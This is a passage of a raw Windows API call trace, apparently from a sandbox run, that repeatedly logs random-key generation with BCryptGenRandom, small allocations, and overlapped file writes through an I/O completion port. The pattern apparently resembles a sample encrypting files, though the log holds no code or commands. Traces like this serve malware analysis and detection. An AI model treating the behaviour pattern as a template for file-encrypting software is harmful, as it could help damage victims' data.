[0167.398] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.398] free (_Block=0x3e305b8) [0167.398] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.398] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.399] free (_Block=0x1fa91d0) [0167.399] free (_Block=0x1fa2ed8) [0167.399] free (_Block=0x1fa90b8) [0167.399] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.415] CloseHandle (hObject=0x3cc) returned 1 [0167.416] free (_Block=0x3df0008) [0167.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.443] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.555] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x6930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.568] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.572] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4584, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.903] CloseHandle (hObject=0x2a8) returned 1 [0167.903] free (_Block=0x3e70008) [0167.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0167.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0167.914] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.915] free (_Block=0x3e305b8) [0167.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.915] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.915] free (_Block=0x1fa91d0) [0167.915] free (_Block=0x1fa2ed8) [0167.915] free (_Block=0x1fa90b8) [0167.915] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0167.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0167.926] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.926] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.926] free (_Block=0x3e305b8) [0167.926] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.926] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.926] free (_Block=0x1fa91d0) [0167.926] free (_Block=0x1fa2ed8) [0167.926] free (_Block=0x1fa90b8) [0167.926] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0168.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.116] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.116] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.116] free (_Block=0x3e305b8) [0168.116] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.116] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.116] free (_Block=0x1fa91d0) [0168.116] free (_Block=0x1fa2ed8) [0168.116] free (_Block=0x1fa90b8) [0168.116] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0168.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.117] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0168.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.252] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.253] free (_Block=0x3e305b8) [0168.253] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.253] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.253] free (_Block=0x1fa91d0) [0168.253] free (_Block=0x1fa2ed8) [0168.253] free (_Block=0x1fa90b8) [0168.253] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.254] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.371] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.371] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.371] free (_Block=0x3e305b8) [0168.371] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.371] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.371] free (_Block=0x1fa91d0) [0168.371] free (_Block=0x1fa2ed8) [0168.372] free (_Block=0x1fa90b8) [0168.372] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.373] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x9ac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0168.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.399] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.399] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.399] free (_Block=0x3e305b8) [0168.399] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.399] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.399] free (_Block=0x1fa91d0) [0168.399] free (_Block=0x1fa2ed8) [0168.399] free (_Block=0x1fa90b8) [0168.399] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.410] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.410] free (_Block=0x3e305b8) [0168.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.410] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.410] free (_Block=0x1fa91d0) [0168.410] free (_Block=0x1fa2ed8) [0168.410] free (_Block=0x1fa90b8) [0168.410] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.420] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.420] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.421] free (_Block=0x3e305b8) [0168.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.421] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.421] free (_Block=0x1fa91d0) [0168.421] free (_Block=0x1fa2ed8) [0168.421] free (_Block=0x1fa90b8) [0168.422] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.424] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.440] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.440] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.440] free (_Block=0x3e305b8) [0168.440] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.440] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.440] free (_Block=0x1fa91d0) [0168.440] free (_Block=0x1fa2ed8) [0168.440] free (_Block=0x1fa90b8) [0168.440] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.456] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.456] free (_Block=0x3e305b8) [0168.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.456] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.456] free (_Block=0x1fa91d0) [0168.456] free (_Block=0x1fa2ed8) [0168.456] free (_Block=0x1fa90b8) [0168.456] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0168.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.470] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.470] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.471] free (_Block=0x3e305b8) [0168.471] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.471] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.471] free (_Block=0x1fa91d0) [0168.471] free (_Block=0x1fa2ed8) [0168.471] free (_Block=0x1fa90b8) [0168.471] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.485] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.485] free (_Block=0x3e305b8) [0168.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.485] free (_Block=0x1fa91d0) [0168.485] free (_Block=0x1fa2ed8) [0168.485] free (_Block=0x1fa90b8) [0168.485] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0168.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0168.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0168.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0168.496] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.496] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.496] free (_Block=0x3e305b8) [0168.496] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.496] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.496] free (_Block=0x1fa91d0) [0168.496] free (_Block=0x1fa2ed8) [0168.496] free (_Block=0x1fa90b8) [0168.496] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 